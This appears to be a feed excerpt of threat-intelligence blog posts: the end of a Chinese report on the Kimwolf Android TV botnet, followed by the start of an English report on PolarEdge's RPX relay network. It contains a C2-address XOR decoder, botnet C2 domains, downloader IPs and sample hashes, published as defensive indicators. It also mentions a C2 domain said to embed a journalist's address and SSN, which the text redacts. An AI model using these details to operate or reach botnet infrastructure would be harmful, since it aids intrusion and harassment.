<p>&#x5728;&#x6B64;&#x6B21;&#x6D3B;&#x52A8;&#x4E2D;&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x4E86;&#x4E3A;&#x4E86;&#x6700;&#x5927;&#x9650;&#x5EA6;&#x7684;&#x69A8;&#x5E72;&#x88AB;&#x5165;&#x4FB5;&#x8BBE;&#x5907;&#x7684;&#x5E26;&#x5BBD;&#xFF0C;&#x5229;&#x76CA;&#x6700;&#x5927;&#x5316;&#x3002;&#x9664;&#x4E86;Kimwolf&#x548C;Aisuru&#x4E4B;&#x540E;&#xFF0C;&#x8FD8;&#x6295;&#x5165;&#x4E86;Rust&#x8BED;&#x8A00;&#x5B9E;&#x73B0;&#x7684;Command Client&#x4EE5;&#x53CA;ByteConnect SDK&#x3002;</p>
<h4 id="1-command-client">1: Command Client</h4>
<p>Command Client&#x7684;&#x76EE;&#x7684;&#x662F;&#x7EC4;&#x5EFA;&#x4EE3;&#x7406;&#x7F51;&#x7EDC;&#xFF0C;&#x5B83;&#x4EE5;&#x4EE3;&#x7406; socks &#x4E3A;&#x76EE;&#x6807;, &#x4ECE; C2 &#x63A5;&#x6536;&#x4EE3;&#x7406;&#x8BF7;&#x6C42;, &#x5E76;&#x5C06;&#x4EE3;&#x7406;&#x7ED3;&#x679C;&#x8FD4;&#x56DE;&#x7ED9; C2&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_ruststr.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<p>&#x6837;&#x672C;&#x4F1A;&#x5C06; CC &#x5730;&#x5740;&#x4EE5;&#x5BC6;&#x6587;&#x5F62;&#x5F0F;&#x4FDD;&#x5B58;&#x5728; rodata &#x6BB5;, &#x89E3;&#x5BC6;&#x7B97;&#x6CD5;&#x5E76;&#x4E0D;&#x590D;&#x6742;, &#x4E3A;&#x540C;&#x957F;&#x5BC6;&#x7801;&#x8868;&#x7684;&#x6309;&#x5B57;&#x8282;&#x5F02;&#x6216;.</p>
<pre><code>def dec(encbts):
    tb1_off = 0
    tb2_off = 0x058BCD2 - 0x058BCA0
    bts = []
    for i in range(0, 0x30*4):
        bts.append(chr(encbts[tb1_off+i] ^ encbts[tb2_off+i]))
    return(&quot;&quot;.join(bts[:0x32]))
</code></pre>
<p>&#x57FA;&#x4E8E;&#x6211;&#x4EEC;&#x624B;&#x4E2D;&#x7684;&#x6837;&#x672C;, &#x53EF;&#x8FD8;&#x539F;&#x51FA;&#x4E24;&#x6761;CC&#x5730;&#x5740;, &#x5206;&#x522B;&#x5982;&#x4E0B;:</p>
<pre><code>proxy-sdk.14emeliaterracewestroxburyma02132.su:443
sdk-bright.14emeliaterracewestroxburyma02132.su:443
</code></pre>
<h4 id="2-byteconnect-sdk">2: ByteConnect SDK</h4>
<p>&#x6240;&#x8C13;ByteConnect SDK &#x662F;&#x4E00;&#x6B3E;&#x53D8;&#x73B0;&#x89E3;&#x51B3;&#x65B9;&#x6848;&#xFF0C;&#x53EF;&#x5E2E;&#x52A9;&#x5F00;&#x53D1;&#x8005;&#x5728;&#x5404;&#x79CD;&#x5E73;&#x53F0;&#x4E0A;&#x901A;&#x8FC7;&#x5E94;&#x7528;&#x7A0B;&#x5E8F;&#x521B;&#x6536;&#xFF0C;&#x4ED6;&#x4EEC;&#x5BA3;&#x79F0;&#x81EA;&#x5DF1;&#x7684; SDK &#x8BBE;&#x8BA1;&#x8F7B;&#x5DE7;&#x3001;&#x5B89;&#x5168;&#xFF0C;&#x6613;&#x4E8E;&#x96C6;&#x6210;&#xFF0C;&#x5B83;&#x65E0;&#x5E7F;&#x544A;&#xFF0C;&#x65E0;&#x52A0;&#x5BC6;&#x8D27;&#x5E01;&#x6316;&#x77FF;&#xFF0C;&#x4E0D;&#x5F71;&#x54CD;&#x6027;&#x80FD;&#xFF0C;&#x5BF9;&#x7528;&#x6237;&#x4F53;&#x9A8C;&#x7684;&#x5F71;&#x54CD;&#x6781;&#x5C0F;&#xFF0C;&#x7528;&#x6237;&#x751A;&#x81F3;&#x4E0D;&#x4F1A;&#x5BDF;&#x89C9;&#x5230;&#x5B83;&#x7684;&#x5B58;&#x5728;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_byteconnect.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<p>Downloader&#x811A;&#x672C;&#x4E0B;&#x8F7D;&#x7684;mreo12&#x6B63;&#x662F;ByteConnect SDK&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_bc.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<p>ByteConnect&#x7684;&#x4E3B;&#x9875;&#x6709;&#x4E00;&#x4E2A;&#x6536;&#x5165;&#x8BA1;&#x7B97;&#x516C;&#x5F0F;&#xFF1A;1&#x4E07;&#x4E2A;&#x63A5;&#x5165;&#x70B9;&#x5BA2;&#xFF0C;70% Opt-in Rate&#xFF0C;&#x6BCF;&#x6708;&#x5C06;&#x6709;490&#x7F8E;&#x5143;&#x7684;&#x6536;&#x5165;&#x3002;&#x4EE5;Kimwolf 180&#x4E07;&#x7684;&#x89C4;&#x6A21;&#x6765;&#x8BF4;&#xFF0C;&#x5176;&#x80CC;&#x540E;&#x7684;&#x7EC4;&#x7EC7;&#x6BCF;&#x6708;&#x901A;&#x8FC7;ByteConnect&#x8D5A;&#x53D6;&#x7684;&#x60CA;&#x4EBA;&#x7684;88200&#x7F8E;&#x5143;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_money.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<h1 id="%E5%B0%8F%E5%B0%8F%E5%85%AB%E5%8D%A6">&#x5C0F;&#x5C0F;&#x516B;&#x5366;</h1>
<p>&#x8C03;&#x67E5;&#x53D1;&#x73B0;&#xFF0C;Kimwolf&#x7684;&#x4F5C;&#x8005;&#x5BF9;&#x77E5;&#x540D;&#x7F51;&#x7EDC;&#x5B89;&#x5168;&#x8C03;&#x67E5;&#x8BB0;&#x8005;Brian Krebs&#x8868;&#x73B0;&#x51FA;&#x8FD1;&#x4E4E;&#x201C;&#x75F4;&#x8FF7;&#x201D;&#x7684;&#x6267;&#x5FF5;&#xFF0C;&#x5728;&#x591A;&#x4E2A;&#x6837;&#x672C;&#x4E2D;&#x7559;&#x4E0B;&#x4E0E;&#x4ED6;&#x76F8;&#x5173;&#x7684;&#x5F69;&#x86CB;&#x3002;</p>
<p>&#x4F8B;&#x5982;&#xFF0C;&#x5728;&#x6837;&#x672C;2078af54891b32ea0b1d1bf08b552fe8&#x4E2D;&#xFF0C;&#x5176;udp_dns&#x4E0E;mc_enc&#x653B;&#x51FB;&#x65B9;&#x6CD5;&#x4E2D;&#x5747;&#x5D4C;&#x5165;&#x4E86;&#x57DF;&#x540D;<strong>fuckbriankrebs[.]com</strong>&#xFF0C;&#x7528;&#x4E8E;&#x751F;&#x6210;DNS&#x8BF7;&#x6C42;&#x8F7D;&#x8377;&#x3002;</p>
<p>&#x800C;&#x5728;&#x6837;&#x672C;1c03d82026b6bcf5acd8fc4bcf48ed00&#x7684;&#x63A7;&#x5236;&#x53F0;&#x8F93;&#x51FA;&#x4E2D;&#xFF0C;&#x66F4;&#x662F;&#x76F4;&#x63A5;&#x51FA;&#x73B0;&#x4E86;<strong>KREBSFIVEHEADFANCLUB</strong>&#x5B57;&#x6837;&#xFF0C;&#x76F4;&#x8BD1;&#x4E3A;&#x201C;Krebs&#x5927;&#x8111;&#x95E8;&#x7C89;&#x4E1D;&#x4FF1;&#x4E50;&#x90E8;&#x201D;&#xFF0C;&#x54C8;&#x54C8;&#xFF0C;&#x59A5;&#x59A5;&#x7684;&#x201C;&#x9ED1;&#x7C89;&#x201D;&#x884C;&#x4E3A;&#x3002;</p>
<p>&#x9664;&#x4E86;&#x8FD9;&#x79CD;&#x76F4;&#x63A5;&#x7684;&#x201C;&#x81F4;&#x656C;&#x201D;&#xFF0C;&#x8FD8;&#x6709;&#x9690;&#x85CF;&#x66F4;&#x6DF1;&#x7684;&#x201C;&#x7231;&#x201D;&#x3002;&#x6211;&#x4EEC;&#x63A5;&#x7BA1;&#x7684;C2&#x57DF;&#x540D;fuckyoukrebs1.briankrabs.seanobrien[redacted]ssn[redacted].su&#xFF0C;&#x9664;&#x4E86;&#x660E;&#x9762;&#x4E0A;Krebs&#x4FE9;&#x6B21;&#xFF0C;&#x8FD9;&#x4E00;&#x57DF;&#x540D;&#x8FD8;&#x6697;&#x85CF;&#x7384;&#x673A;&#xFF1A;<code>seanobrien[redacted]</code>&#x5BF9;&#x5E94;&#x7684;&#x53EF;&#x80FD;&#x662F;Krebs&#x7684;&#x5B9E;&#x9645;&#x4F4F;&#x5740;&#xFF0C;<code>ssn[redacted]</code>&#x5219;&#x53EF;&#x80FD;&#x662F;&#x5176;&#x793E;&#x4F1A;&#x5B89;&#x5168;&#x53F7;&#x7801;&#x3002;&#x5982;&#x6B64;&#x884C;&#x4E3A;&#xFF0C;&#x582A;&#x79F0;&#x7F51;&#x5B89;&#x4E16;&#x754C;&#x7684;&#x201C;&#x79C1;&#x751F;&#x996D;&#x201D;&#xFF0C;&#x7740;&#x5B9E;&#x8BA9;&#x4EBA;&#x53D1;&#x61B7;&#x3002;</p>
<h1 id="%E6%80%BB%E7%BB%93">&#x603B;&#x7ED3;</h1>
<p>&#x8FD9;&#x662F;&#x6211;&#x4EEC;&#x76EE;&#x524D;&#x638C;&#x63E1;&#x7684;Kimwolf&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7684;&#x5927;&#x90E8;&#x5206;&#x60C5;&#x62A5;&#x3002;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x59CB;&#x53D1;&#x4E8E;2016&#x5E74;&#x7684;mirai&#xFF0C;&#x611F;&#x67D3;&#x7684;&#x76EE;&#x6807;&#x4E3B;&#x8981;&#x96C6;&#x4E2D;&#x5728;&#x5BB6;&#x5EAD;&#x5BBD;&#x5E26;&#x8DEF;&#x7531;&#x5668;&#xFF0C;&#x6444;&#x50CF;&#x5934;&#x7B49;IoT&#x8BBE;&#x5907;&#x4E0A;&#x3002;&#x7136;&#x800C;&#x8FD1;&#x5E74;&#x6765; Badbox&#x3001;Bigpanzi&#x3001;Vo1d&#x3001;Kimwolf&#x7B49;&#x591A;&#x4E2A;&#x767E;&#x4E07;&#x7EA7;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x4FE1;&#x606F;&#x88AB;&#x62AB;&#x9732;&#xFF0C;&#x8868;&#x660E;&#x90E8;&#x5206;&#x653B;&#x51FB;&#x8005;&#x5F00;&#x59CB;&#x5C06;&#x6CE8;&#x610F;&#x529B;&#x8F6C;&#x5411;&#x591A;&#x6B3E;&#x667A;&#x80FD;&#x7535;&#x89C6;&#x3001;&#x7535;&#x89C6;&#x76D2;&#x5B50;&#x3002;&#x8FD9;&#x4E9B;&#x8BBE;&#x5907;&#x666E;&#x904D;&#x5B58;&#x5728;&#x56FA;&#x4EF6;&#x6F0F;&#x6D1E;&#x3001;&#x9884;&#x88C5;&#x6076;&#x610F;&#x7EC4;&#x4EF6;&#x3001;&#x5F31;&#x53E3;&#x4EE4;&#x4EE5;&#x53CA;&#x7F3A;&#x4E4F;&#x5B89;&#x5168;&#x66F4;&#x65B0;&#x673A;&#x5236;&#x7B49;&#x95EE;&#x9898;&#xFF0C;&#x6781;&#x6613;&#x88AB;&#x653B;&#x51FB;&#x8005;&#x957F;&#x671F;&#x63A7;&#x5236;&#x5E76;&#x7528;&#x4E8E;&#x5927;&#x89C4;&#x6A21;&#x7F51;&#x7EDC;&#x653B;&#x51FB;&#x3002;&#x6211;&#x4EEC;&#x62AB;&#x9732;&#x672C;&#x6B21;Kimwolf&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7684;&#x52A8;&#x673A;&#x4E4B;&#x4E00;&#xFF0C;&#x5C31;&#x662F;&#x547C;&#x5401;&#x5B89;&#x5168;&#x793E;&#x533A;&#x5BF9;&#x667A;&#x80FD;&#x7535;&#x89C6;&#x76F8;&#x5173;&#x8BBE;&#x5907;&#x7ED9;&#x4E88;&#x5E94;&#x6709;&#x7684;&#x91CD;&#x89C6;&#x3002;</p>
<p>&#x667A;&#x80FD;&#x7535;&#x89C6;&#x88AB;&#x653B;&#x51FB;&#x8005;&#x62FF;&#x5230;root&#x6743;&#x9650;&#x540E;&#xFF0C;&#x5E26;&#x6765;&#x7684;&#x653B;&#x51FB;&#x4E0D;&#x9650;&#x4E8E;&#x4F20;&#x7EDF;&#x7684;&#x7F51;&#x7EDC;&#x7A7A;&#x95F4;&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x53EF;&#x4EE5;&#x5229;&#x7528;&#x53D7;&#x63A7;&#x7EC8;&#x7AEF;&#x63D2;&#x64AD;&#x88AB;&#x7BE1;&#x6539;&#x3001;&#x6709;&#x504F;&#x5411;&#x6216;&#x8005;&#x6781;&#x7AEF;&#x89C6;&#x9891;&#xFF0C;&#x5728;&#x8BB8;&#x591A;&#x56FD;&#x5BB6;&#x7684;&#x6CD5;&#x5F8B;&#x4F53;&#x5236;&#x4E2D;&#xFF0C;&#x672A;&#x7ECF;&#x4E66;&#x9762;&#x8BB8;&#x53EF;&#x63D2;&#x64AD;&#x5185;&#x5BB9;&#x662F;&#x7834;&#x574F;&#x4E86;&#x89C2;&#x4F17;&#x548C;&#x7535;&#x89C6;&#x8282;&#x76EE;&#x4F9B;&#x5E94;&#x5546;&#x7684;&#x5951;&#x7EA6;&#xFF0C;&#x662F;&#x8FDD;&#x6CD5;&#x884C;&#x4E3A;&#x3002;&#x4F8B;&#x5982;&#xFF0C;&#x7F8E;&#x56FD;&#x534E;&#x76DB;&#x987F;&#x7279;&#x533A; HUD &#x603B;&#x90E8;&#x7684;&#x7535;&#x89C6;&#x8BBE;&#x5907;&#x66FE;&#x88AB;&#x9ED1;&#x5BA2;&#x7BE1;&#x6539;&#x5E76;&#x64AD;&#x653E;&#x4E00;&#x6BB5;&#x672A;&#x7ECF;&#x6388;&#x6743;&#x7684; AI &#x4F2A;&#x9020;&#x89C6;&#x9891;&#xFF08;&#x5185;&#x5BB9;&#x4E3A;&#x7279;&#x6717;&#x666E;&#x4EB2;&#x543B;&#x9A6C;&#x65AF;&#x514B;&#x811A;&#x8DBE;&#xFF0C;&#x5E76;&#x9644;&#x5E26;<code>LONG LIVE THE REAL KING</code>&#x5B57;&#x6837;&#xFF09;&#xFF0C;&#x5F15;&#x53D1;&#x4E86;&#x663E;&#x8457;&#x7684;&#x516C;&#x5171;&#x5B89;&#x5168;&#x4E0E;&#x8206;&#x8BBA;&#x98CE;&#x9669;&#xFF0C;&#x7B49;&#x7B49;&#x3002;&#x8FD9;&#x662F;&#x6211;&#x4EEC;&#x62AB;&#x9732;&#x672C;&#x6B21;Kimwolf&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7684;&#x52A8;&#x673A;&#x4E4B;&#x4E8C;&#xFF0C;&#x547C;&#x5401;&#x6267;&#x6CD5;&#x673A;&#x6784;&#x8003;&#x8651;&#x5BF9;&#x6B64;&#x7C7B;&#x5BF9;&#x667A;&#x80FD;&#x7535;&#x89C6;&#x76F8;&#x5173;&#x7684;&#x6D89;&#x5ACC;&#x8FDD;&#x6CD5;&#x884C;&#x4E3A;&#x52A0;&#x4EE5;&#x5BA1;&#x67E5;&#x3002;</p>
<figure style="text-align:center;">
  <img src="https://blog.xlab.qianxin.com/content/images/2025/12/--2025-12-11-23.06.51.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" style="width:100%;">
  <figcaption>
    <a href="https://www.nbcnews.com/politics/doge/fake-video-trump-kissing-musks-feet-displayed-hud-office-washington-rcna193503?ref=blog.xlab.qianxin.com" target="_blank">&#x7F8E;&#x56FD;&#x5168;&#x56FD;&#x5E7F;&#x64AD;&#x516C;&#x53F8;&#x65B0;&#x95FB;&#xFF08;NBC News&#xFF09;&#x62A5;&#x9053;</a></figcaption>
</figure>
<p>&#x5728;&#x591A;&#x91CD;&#x5A01;&#x80C1;&#x53E0;&#x52A0;&#x7684;&#x80CC;&#x666F;&#x4E0B;&#xFF0C;&#x65E0;&#x8BBA;&#x662F;&#x666E;&#x901A;&#x7535;&#x89C6;&#x76D2;&#x5B50;&#x7528;&#x6237;&#x3001;&#x9500;&#x552E;&#x6E20;&#x9053;&#x3001;&#x8FD0;&#x8425;&#x5546;&#xFF0C;&#x8FD8;&#x662F;&#x76D1;&#x7BA1;&#x90E8;&#x95E8;&#x4E0E;&#x5382;&#x5546;&#xFF0C;&#x90FD;&#x5FC5;&#x987B;&#x9AD8;&#x5EA6;&#x91CD;&#x89C6;&#x7535;&#x89C6;&#x76D2;&#x5B50;&#x7684;&#x5B89;&#x5168;&#x3002;&#x5176;&#x4E2D;&#xFF0C;&#x7535;&#x89C6;&#x76D2;&#x5B50;&#x7528;&#x6237;&#x5C24;&#x5176;&#x5E94;&#x5F53;&#xFF1A;&#x786E;&#x4FDD;&#x8BBE;&#x5907;&#x6765;&#x6E90;&#x53EF;&#x9760;&#x3001;&#x4F7F;&#x7528;&#x53EF;&#x53CA;&#x65F6;&#x66F4;&#x65B0;&#x7684;&#x56FA;&#x4EF6;&#x3001;&#x907F;&#x514D;&#x8BBE;&#x7F6E;&#x5F31;&#x5BC6;&#x7801;&#xFF0C;&#x5E76;&#x62D2;&#x7EDD;&#x5B89;&#x88C5;&#x6765;&#x8DEF;&#x4E0D;&#x660E;&#x7684; APK&#xFF0C;&#x4EE5;&#x964D;&#x4F4E;&#x88AB;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x611F;&#x67D3;&#x548C;&#x64CD;&#x63A7;&#x7684;&#x98CE;&#x9669;&#x3002;</p>
<p>&#x8BDA;&#x631A;&#x6B22;&#x8FCE;&#x5404;&#x56FD;CERT&#xFF08;&#x8BA1;&#x7B97;&#x673A;&#x5E94;&#x6025;&#x54CD;&#x5E94;&#x5C0F;&#x7EC4;&#xFF09;&#x4E0E;&#x6211;&#x4EEC;&#x8054;&#x7CFB;&#xFF0C;&#x5171;&#x4EAB;&#x60C5;&#x62A5;&#x4E0E;&#x89C6;&#x91CE;&#xFF0C;&#x643A;&#x624B;&#x6253;&#x51FB;&#x7F51;&#x7EDC;&#x72AF;&#x7F6A;&#xFF0C;&#x5171;&#x540C;&#x7EF4;&#x62A4;&#x5168;&#x7403;&#x7F51;&#x7EDC;&#x5B89;&#x5168;&#x3002;&#x5982;&#x679C;&#x60A8;&#x5BF9;&#x6211;&#x4EEC;&#x7684;&#x7814;&#x7A76;&#x611F;&#x5174;&#x8DA3;&#xFF0C;&#x6216;&#x8005;&#x4E86;&#x89E3;&#x5185;&#x5E55;&#x6D88;&#x606F;&#xFF0C;&#x6B22;&#x8FCE;&#x901A;&#x8FC7;<a href="https://x.com/Xlab_qax?ref=blog.xlab.qianxin.com">X&#x5E73;&#x53F0;</a>&#x4E0E;&#x6211;&#x4EEC;&#x8054;&#x7CFB;&#x3002;</p>
<h1 id="ioc">IOC</h1>
<h4 id="sample-md5">Sample MD5</h4>
<pre><code># APK
887747dc1687953902488489b805d965
b688c22aabcd83138bba4afb9b3ef4fc
2fd5481e9d20dad6d27e320d5464f71e
5f4ed952e69abb337f9405352cb5cc05
4cd750f32ee5d4f9e335751ae992ce64
8011ed1d1851c6ae31274c2ac8edfc06
95efbc9fdc5c7bcbf469de3a0cc35699
bda398fcd6da2ddd4c756e7e7c47f8d8
ea7e4930b7506c1a5ca7fee10547ef6b
dfe8d1f591d53259e573b98acb178e84
3a172e3a2d330c49d7baa42ead3b6539

# SO ELF
726557aaebee929541f9c60ec86d356e
bf06011784990b3cca02fe997ff9b33d
d086086b35d6c2ecf60b405e79f36d05
2078af54891b32ea0b1d1bf08b552fe8
b89ee1304b94f0951af31433dac9a1bd
34dfa5bc38b8c6108406b1e4da9a21e4
51cfe61eac636aae33a88aa5f95e5185
1c03d82026b6bcf5acd8fc4bcf48ed00

e96073b7ed4a8eb40bed6980a287bc9f
f8a70ca813a6f5123c3869d418f00fe5
33435ec640fbd3451f5316c9e45d46e8
9053cef2ea429339b64f3df88cad8e3f
85ba20e982ed8088bb1ba7ed23b0c497
9b37f3bf3b91aa4f135a6c64aba643bd

# RUST
b1d4739d692d70c3e715f742ac329b05
5490fb81cf24a2defa87ea251f553d11
cf7960034540cd25840d619702c73a26

# Downloader
e4be95de21627b8f988ba9b55c34380c
</code></pre>
<h4 id="c2">C2</h4>
<pre><code>api.groksearch[.net
nnkjzfaxkjanxzk.14emeliaterracewestroxburyma02132[.su

zachebt.chachasli[.de
zachebt.groksearch[.net
rtrdedge1.samsungcdn[.cloud
fuckzachebt.meowmeowmeowmeowmeow.meow.indiahackgod[.su

staging.pproxy1[.fun
sdk-dl-prod.proxiessdk[.online
sdk-dl-production.proxiessdk[.store

lol.713mtauburnctcolumbusoh43085[.st

pawsatyou[.eth
lolbroweborrowtvbro.713mtauburnctcolumbusoh43085[.st
</code></pre>
<h4 id="downloader">Downloader</h4>
<pre><code>93.95.112.50	AS397923 - Resi Rack L.L.C.
93.95.112.51	AS397923 - Resi Rack L.L.C.
93.95.112.52	AS397923 - Resi Rack L.L.C.
93.95.112.53	AS397923 - Resi Rack L.L.C.
93.95.112.54	AS397923 - Resi Rack L.L.C.
93.95.112.55	AS397923 - Resi Rack L.L.C.
93.95.112.59	AS397923 - Resi Rack L.L.C.
</code></pre>
<h1 id="appendix">Appendix</h1>
<h4 id="cyberchef">cyberchef</h4>
<pre><code>https://gchq.github.io/CyberChef/#recipe=Fork(&apos;%5C%5Cn&apos;,&apos;%5C%5Cn&apos;,false)Change_IP_format(&apos;Dotted%20Decimal&apos;,&apos;Hex&apos;)Swap_endianness(&apos;Hex&apos;,4,true)From_Hex(&apos;Auto&apos;)XOR(%7B&apos;option&apos;:&apos;Hex&apos;,&apos;string&apos;:&apos;00%20ce%2004%2091&apos;%7D,&apos;Standard&apos;,false)To_Hex(&apos;Space&apos;,0)Change_IP_format(&apos;Hex&apos;,&apos;Dotted%20Decimal&apos;)&amp;input=NDQuNy4wLjQ1CjE2OC4xLjAuNDUKMTY3LjEuMC40NQoxNjIuMS4wLjQ1CjE4OS4xLjAuNDUKMTgxLjEuMC40NQoxMzEuMS4wLjQ1

</code></pre>
]]></content:encoded></item><item><title><![CDATA[Smoking Gun Uncovered: RPX Relay at PolarEdge’s Core Exposed]]></title><description><![CDATA[<h1 id="background">Background</h1>
<p>On May 30, 2025, <strong>XLab&apos;s Cyber Threat Insight and Analysis System(CTIA)</strong> detected IP address 111.119.223.196 distributing an ELF file named &quot;w&quot;. The AI detection module flagged the file as PolarEdge-related, yet it returned zero positive hits on VirusTotal&#x2014;sparking speculation</p>]]></description><link>https://blog.xlab.qianxin.com/smoking-gun-uncovered-rpx-relay-at-polaredges-core-exposed/</link><guid isPermaLink="false">6901de21f39f9e0001b22b2a</guid><category><![CDATA[ORB]]></category><category><![CDATA[Botnet]]></category><category><![CDATA[Proxy]]></category><category><![CDATA[EN]]></category><dc:creator><![CDATA[Alex.Turing]]></dc:creator><pubDate>Wed, 29 Oct 2025 14:22:43 GMT</pubDate><content:encoded><![CDATA[<h1 id="background">Background</h1>
<p>On May 30, 2025, <strong>XLab&apos;s Cyber Threat Insight and Analysis System(CTIA)</strong> detected IP address 111.119.223.196 distributing an ELF file named &quot;w&quot;. The AI detection module flagged the file as PolarEdge-related, yet it returned zero positive hits on VirusTotal&#x2014;sparking speculation that PolarEdge might have quietly launched a new wave of operations. Curious to verify this, we launched an in-depth investigation. Through targeted correlation analysis, we uncovered <code>RPX_Client</code>, a component never before documented publicly. Its core functions include onboarding compromised devices into the proxy pool of designated C2 nodes, providing proxy services, and enabling remote command execution.</p>
<p>PolarEdge was first disclosed by <strong>Sekoia</strong> on February 25, 2025. It exploits vulnerable IoT/edge devices and purchased VPS to build an Operational Relay Box (ORB) network for cybercrime support. Functionally akin to residential proxies, ORB focuses on long-term stealth and traffic obfuscation&#x2014;a classic infrastructure-as-a-service malware.</p>
<p>ORB excels at evasion, source hiding, and attribution complexity, making it favored by APT actors and a 2025 cybersecurity hotspot. <strong>Mandiant</strong> even coined <a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks?ref=blog.xlab.qianxin.com">&quot;As the ORBs rise, the IOC goes extinct&quot;</a> arguing ORBs undermine traditional indicators in detection and attribution.</p>
<p>In August/September 2025, <strong>Censys</strong> published two PolarEdge reports, using certificate links to analyze infrastructure. Their September 23 report revealed RPX_SERVER, a reverse-proxy gateway. Confidence in tying it to PolarEdge waned after learning the certificates were from legacy Mbed TLS 3.4.0 (formerly PolarSSL).</p>
<blockquote>
<p>Censys Note:<br>
&quot;We were recently informed by a community member that the certificate highlighted in earlier versions of this research is also present in older versions of Mbed TLS, version 3.4.0, previously known as PolarSSL. Additionally, the TLS certificate we had associated with the &#x201C;PolarEdge&#x201D; malware also originates from the same Mbed TLS repository. This new context reduces the confidence of the evidence linking the exposure footprint or the RPX server we analyzed directly to PolarEdge.&quot;</p>
</blockquote>
<p>However, from <strong>Xlab&#x2019;s perspective</strong>, we have <strong>high confidence</strong> in attributing the PolarSSL test certificate infrastructure and RPX_Server mentioned in Censys&#x2019; original report to PolarEdge. This judgment is primarily based on unique intelligence from the captured <strong>RPX_Client</strong> sample, with the following specific evidence:</p>
<ul>
<li>
<p>The coding style of the scripts spreading RPX_Client, along with the ELF sample w, exhibits clear homology with known PolarEdge samples.</p>
</li>
<li>
<p>RPX_Client and RPX_Server are highly complementary in functionality &#x2014; as their names suggest, they form a classic client-server relationship.</p>
</li>
<li>
<p>A database from one RPX_Server contains records of RPX_Client distribution via 111.119.223.196.</p>
</li>
<li>
<p>Some servers using PolarSSL test certificates correctly handle RPX_Client requests and are confirmed to host RPX_Server instances.</p>
</li>
</ul>
<p>The successive discoveries of RPX_Server and RPX_Client have enabled us to delve deeper into PolarEdge&#x2019;s relay operations and infrastructure. The results are promising:</p>
<ul>
<li><strong>Operationally</strong>, we have gradually clarified how PolarEdge leverages RPX_Server, Go-Admin, and Nginx for node management and traffic distribution.</li>
<li><strong>Infrastructurally</strong>, we have identified 140 C2 servers and uncovered over 25,000 infected devices.</li>
</ul>
<p>However, we must acknowledge that <strong>no single vendor has complete visibility</strong> &#x2014; thorough threat analysis inevitably requires broad industry collaboration. To advance research on the PolarEdge ORB network, we are publishing these findings to the community, hoping that the combined efforts of <strong>Sekoia</strong>, <strong>Censys</strong>, and <strong>Xlab</strong> will lay a foundation for deeper future exploration of PolarEdge.</p>
<h1 id="1-infrastructure-scale">1: Infrastructure &amp; Scale</h1>
<hr>
<h2 id="rpx-server-140-vps-nodes"><strong>RPX Server: 140 VPS Nodes</strong></h2>
<p>We captured 10 RPX Server IPs across different periods via script <code>q</code>. All use port 55555 and share the same <a href="https://raw.githubusercontent.com/Mbed-TLS/mbedtls/refs/tags/v3.4.0/tests/data_files/server5.crt?ref=blog.xlab.qianxin.com">public PolarSSL test certificate</a>.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_certificate.png" alt="polar_certificate.png" loading="lazy"></p>
<p>Using the pattern <strong>certificate + port 55555</strong>, we identified 161 candidate IPs. After validating with the reverse-engineered communication protocol, 140 were confirmed as active RPX Servers.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_hunter.png" alt="polar_hunter.png" loading="lazy"></p>
<p>These 140 servers exhibit interesting characteristics: they are all VPS nodes, concentrated in ASNs 45102, 37963, and 132203, and hosted on Alibaba Cloud and Tencent Cloud.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_asn.png" alt="polar_asn.png" loading="lazy"></p>
<p>Reverse engineering also revealed an API that exports proxy pool nodes into Clash configuration files, enabling use by attackers or specific campaigns.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/10/polar_clash.png" alt="polar_clash.png" loading="lazy"></p>
<h2 id="rpx-client-25000-infected-devices"><strong>RPX Client: 25,000+ Infected Devices</strong></h2>
